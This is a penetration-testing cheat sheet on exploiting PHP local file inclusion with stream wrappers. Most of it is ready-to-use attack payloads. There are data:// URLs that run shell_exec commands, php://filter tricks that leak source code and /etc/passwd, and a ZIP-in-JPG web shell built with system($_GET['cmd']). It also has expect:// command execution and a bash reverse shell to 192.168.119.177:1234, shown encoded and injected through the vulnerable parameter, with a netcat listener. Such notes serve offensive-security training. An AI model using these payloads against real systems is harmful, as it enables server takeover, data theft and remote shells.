Data wrappers

#POC

http://192.168.177.10/menu.php?file=data:text/plain,hello world

#If test is successful we can further push the vulnerability launching a php wrapped command

http://10.10.10.10/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
#change syntax for Windows/'Nix targets

#Rot13 - base64 wrappers

http://target.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://target.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://target.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

#ZIP LFI wrapper

echo "<?php system($_GET['cmd']); ?>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php   

http://target.com/index.php?page=zip://shell.jpg%23payload.php

#Expect wrapper

http://target.com/index.php?page=php:expect://id
http://target.com/index.php?page=php:expect://ls

#experiment with other commands

#Assorted commands

#Windows
......file=data:text/plain,<?php echo shell_exec("dir") ?>

#Good technique whenever you have LFI/RCE and path traversal available in PHP enabled servers , Apache is a good example.

#Insert  
data://text/plain,<?php phpinfo(); ?>  
at the point of path traversal

EG:
http://10.11.1.35/section.php?page=data://text/plain,<?php phpinfo(); ?>


#Variants
......page=data:text/plain,<?php echo shell_exec("ls -la") ?>
......page=data:text/plain,<?php echo shell_exec("whoami") ?>
......page=data:text/plain,<?php echo shell_exec("uname -a") ?>
......page=data:text/plain,<?php echo shell_exec("which bash") ?>
......page=data:text/plain,<?php echo shell_exec("which python") ?>
......page=data:text/plain,<?php echo shell_exec("which curl") ?>

#Getting a shell
Insert a URL encoded bash reverse shell (............) 

10.11.1.35/section.php?page=data:text/plain,<?php echo shell_exec(".......................") ?>

#Bash revshell
bash -i >& /dev/tcp/192.168.119.177/1234 0>&1

#Encoded
bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.119.177%2F1234+0%3E%261

#Final
10.11.1.35/section.php?page=data:text/plain,<?php echo shell_exec("bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.119.177%2F1234+0%3E%261") ?>

Listener : nc -nvlp 1234

#Shell

PrevioushaklistgenNextReverse shells

Last updated